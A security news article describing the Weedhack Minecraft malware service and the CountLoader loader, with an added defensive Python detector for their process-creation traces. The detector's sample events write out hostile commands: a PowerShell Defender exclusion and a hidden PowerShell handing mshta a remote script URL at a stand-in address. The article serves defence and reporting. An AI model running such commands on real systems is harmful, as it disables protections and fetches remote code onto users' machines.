Weedhack uses YouTube to infect Minecraft; CountLoader hits 86K
Weedhack used YouTube SEO poisoning and malicious JARs to steal Minecraft accounts and install remote-access tools. CountLoader has infected about 86,000 machines via cracked software sites.
McAfee Labs identified a malware-as-a-service called Weedhack that has targeted Minecraft players since January 2026. The campaign used YouTube search results and videos to drive downloads from more than 240 malicious URLs and hosted about 3,820 unique JAR files designed to install further payloads.
McAfee researcher Aayush Tyagi noted, “This campaign utilizes SEO poisoning and YouTube to generate traffic to these malicious URLs,” and investigators found two YouTube channels and multiple videos redirecting viewers to the harmful downloads.
The infection chain typically begins when a user runs a JAR file such as DonutDupe.jar. That file uses a technique known as EtherHiding: instead of embedding a hard-coded command-and-control address, it reads the current address from data stored on the Ethereum blockchain, so the operators can rotate infrastructure without reissuing the loader and a takedown of any single server does not break the chain. DonutDupe.jar then downloads a second payload, Elevator.jar, which gathers system details, adds Microsoft Defender exclusions and drops two more modules. SecurityManager.jar establishes persistence and stages Component.jar, which provides remote-access and command capabilities. Operators host an online dashboard at weedhack[.]to where customers can view stolen credentials, craft payloads and monitor infected systems.
Weedhack can target Minecraft versions 1.21.0 through 1.21.11 and can inject into legitimate mods and launchers. The service is offered in a free tier that includes an infostealer able to capture Minecraft session IDs, screenshots and files; harvest cookies, saved passwords and data from 36 browsers, 56 browser wallets and 12 desktop wallet apps; and collect credentials for platforms such as Discord, Steam and Telegram. A premium tier, priced from $4.99 per month or $24.99 for a lifetime license, adds remote functions including webcam access, keylogging, reverse shells, screen and input control, and file transfer. The operators promote the product and provide updates and support through a Telegram channel with more than 850 members.
McAfee reported the majority of Weedhack infections in the United States, followed by Germany, India, the U.K., Italy, Vietnam, Canada, Norway, Sweden, Finland and Spain. Investigators observed cases in which customers used remote features to record victims via webcams and share videos in the Telegram group.
Separately, McAfee disclosed that CountLoader, an obfuscated JavaScript loader distributed through sites offering cracked software, has compromised roughly 86,000 unique machines. The infection starts when a user runs an EXE that launches a PowerShell command to download and execute the CountLoader script via mshta.exe. CountLoader establishes persistence, contacts its C2 servers and attempts to spread via USB drives; McAfee estimated about 9,000 infections resulted from removable media.
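Both chains above leave the same kind of trail in process-creation telemetry: a Java process (the Weedhack JARs) or a downloaded EXE (CountLoader) spawning a script host, PowerShell adding Defender exclusions, and mshta.exe being handed a remote URL. The following detector is an added example written for this page, not McAfee's detection logic or anything from the campaigns' own tooling. It runs a handful of rules over constructed Sysmon-style process events; the field names (parent_image, image, command_line), the sample paths and the 203.0.113.10 address are assumptions made up for the demonstration.

```python
import ntpath
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    """One process-creation record (Sysmon Event ID 1 / Windows 4688 style).
    Field names are an assumption for this example."""
    parent_image: str
    image: str
    command_line: str


def _base(path: str) -> str:
    """Case-folded file name of a Windows path."""
    return ntpath.basename(path).lower()


SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe",
                "wscript.exe", "cscript.exe"}
JAVA_IMAGES = {"java.exe", "javaw.exe"}

# Defender tampering as seen from PowerShell: adding exclusions or disabling features.
DEFENDER_TAMPER = re.compile(
    r"(Add-MpPreference\s+-Exclusion(Path|Process|Extension))|"
    r"(Set-MpPreference\s+-Disable\w+)", re.IGNORECASE)
REMOTE_URL = re.compile(r"https?://", re.IGNORECASE)
# "mshta http://..." embedded in another process's command line (the CountLoader pattern).
MSHTA_URL = re.compile(r"\bmshta(\.exe)?\s+[\"']?https?://", re.IGNORECASE)


def classify(ev: ProcEvent) -> list[str]:
    """Return the names of every rule the event trips (empty list if benign)."""
    hits = []
    parent, child = _base(ev.parent_image), _base(ev.image)
    if parent in JAVA_IMAGES and child in SCRIPT_HOSTS:
        hits.append("java_spawned_script_host")      # Weedhack JAR stages
    if DEFENDER_TAMPER.search(ev.command_line):
        hits.append("defender_tamper")               # Elevator.jar behaviour
    if child == "mshta.exe" and REMOTE_URL.search(ev.command_line):
        hits.append("mshta_remote_content")          # mshta fetching a URL
    if child != "mshta.exe" and MSHTA_URL.search(ev.command_line):
        hits.append("script_invokes_remote_mshta")   # PowerShell handing mshta a URL
    return hits


def scan(events: list[ProcEvent]) -> list[tuple[int, str]]:
    """(event index, rule name) for every hit, in event order."""
    return [(i, rule) for i, ev in enumerate(events) for rule in classify(ev)]


# Constructed sample events (not from McAfee's report) modelling the two chains.
SAMPLE_EVENTS = [
    # Weedhack: a JAR stage uses PowerShell to add a Defender exclusion.
    ProcEvent(r"C:\Program Files\Java\bin\java.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              'powershell -Command "Add-MpPreference -ExclusionPath '
              '\'C:\\Users\\alice\\AppData\\Roaming\\.minecraft\'"'),
    # CountLoader: cracked-software EXE -> PowerShell -> mshta with a remote script.
    ProcEvent(r"C:\Users\alice\Downloads\setup_crack.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              'powershell -w hidden -c "mshta http://203.0.113.10/count.hta"'),
    ProcEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"C:\Windows\System32\mshta.exe",
              "mshta http://203.0.113.10/count.hta"),
    # Benign: an interactive PowerShell launched from Explorer.
    ProcEvent(r"C:\Windows\explorer.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell Get-Process"),
]

if __name__ == "__main__":
    for idx, rule in scan(SAMPLE_EVENTS):
        print(f"event {idx}: {rule}")
```

The rules are deliberately narrow. A Java process spawning PowerShell is rare on a gaming PC but common on developer workstations, and mshta.exe with a local .hta argument is legitimate, so the second and third rules key on a remote URL rather than on mshta.exe alone. In a real deployment you would feed these from a SIEM query over Sysmon or 4688 events rather than from an in-memory list.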
CountLoader operators have used the loader to deploy multiple payloads, including Cobalt Strike, PureHVNC RAT, Amatera Stealer and mining or clipping tools. The most recent deployments included a cryptocurrency clipper that hijacks clipboard contents to redirect transactions.
Kaspersky researchers described a related long-running campaign that used illegal movie and TV streaming sites to push a fake video-player update that installs a cryptocurrency miner. The attack delivered a ZIP archive containing a legitimate installer executable and a malicious DLL. When the installer ran, it side-loaded the malicious DLL from its own directory in place of the library it expected, and that DLL ran a fork of SilentCryptoMiner, which disabled protections, repeatedly requested elevation until the user granted it, ran watchdog components to keep itself active and launched XMRig-based CPU and GPU miners. In some instances the campaign also deployed a remote-access agent capable of running commands and dropping additional components.
Researchers recommended avoiding unofficial Minecraft clients and mods from unverified sites, being careful with search results and YouTube links that promise cracked or enhanced game files, keeping security software up to date, restricting permissions for unknown downloads and steering clear of pirated software and media sites where loaders and miner campaigns commonly spread.